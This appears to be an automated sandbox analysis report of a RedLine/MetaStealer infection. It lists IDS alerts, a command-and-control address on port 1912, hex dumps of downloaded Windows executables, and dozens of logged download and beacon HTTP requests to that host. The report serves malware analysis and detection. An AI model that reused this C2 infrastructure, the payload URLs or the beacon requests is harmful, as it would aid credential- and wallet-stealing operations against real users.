Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49786 -> 176.111.174.140:1912
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 176.111.174.140:1912 -> 192.168.2.5:49786
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 176.111.174.140:1912 -> 192.168.2.5:49786
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 176.111.174.140:1912
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49711 -> 176.111.174.140:1912
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 18:22:37 GMTETag: "3d600-624c4633f8951"Accept-Ranges: bytesContent-Length: 251392Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8c d6 90 63 c8 b7 fe 30 c8 b7 fe 30 c8 b7 fe 30 0c 72 30 30 9e b7 fe 30 0c 72 33 30 c1 b7 fe 30 c8 b7 ff 30 5a b7 fe 30 34 c0 47 30 c7 b7 fe 30 0c 72 31 30 ee b7 fe 30 34 c0 42 30 c9 b7 fe 30 ef 71 2d 30 c1 b7 fe 30 ef 71 34 30 c9 b7 fe 30 ef 71 32 30 c9 b7 fe 30 52 69 63 68 c8 b7 fe 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 6d a7 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 e4 00 00 00 16 03 00 00 00 00 00 e0 45 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 68 01 00 57 00 00 00 f4 59 01 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 b0 0d 00 00 00 00 00 00 00 00 00 00 00 10 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 42 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 87 68 00 00 00 00 01 00 00 6a 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 8e 02 00 00 70 01 00 00 68 02 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b0 0d 00 00 00 00 04 00 00 0e 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 0d 00 00 00 10 04 00 00 0e 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:14 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 21:56:05 GMTETag: "47400-624c75ea5eea6"Accept-Ranges: bytesContent-Length: 291840Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 4b e0 d8 65 2a 8e 8b 65 2a 8e 8b 65 2a 8e 8b 65 2a 8f 8b 1a 2a 8e 8b 99 5d 37 8b 62 2a 8e 8b a1 ef 43 8b 6f 2a 8e 8b a1 ef 41 8b 5a 2a 8e 8b a1 ef 40 8b d4 2a 8e 8b 42 ec 40 8b 60 2a 8e 8b 42 ec 41 8b 70 2a 8e 8b 42 ec 44 8b 64 2a 8e 8b 42 ec 47 8b 64 2a 8e 8b 42 ec 42 8b 64 2a 8e 8b 52 69 63 68 65 2a 8e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 75 d9 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 0c 03 00 00 0a 02 00 00 00 00 00 40 e9 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 fd 03 00 56 00 00 00 f4 f1 03 00 50 00 00 00 00 10 05 00 88 02 00 00 00 d0 04 00 34 32 00 00 00 00 00 00 00 00 00 00 00 20 05 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a4 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 0a 03 00 00 10 00 00 00 0c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 de 00 00 00 20 03 00 00 e0 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 cc 00 00 00 00 04 00 00 28 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 34 32 00 00 00 d0 04 00 00 34 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 88 02 00 00 00 10 05 00 00 04 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3e 22 00 00 00 20 05 00 00 24 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 19:00:38 GMTETag: "4b200-624c4eb378792"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 9e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 2c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:23 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 17 Oct 2024 20:47:45 GMTETag: "59215b-624b24c711d7d"Accept-Ranges: bytesContent-Length: 5841243Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f1 77 11 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 a7 25 59 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.111.174.140 176.111.174.140
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WILWAWPL WILWAWPL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49704 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49709 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49710 -> 176.111.174.140:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 43
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
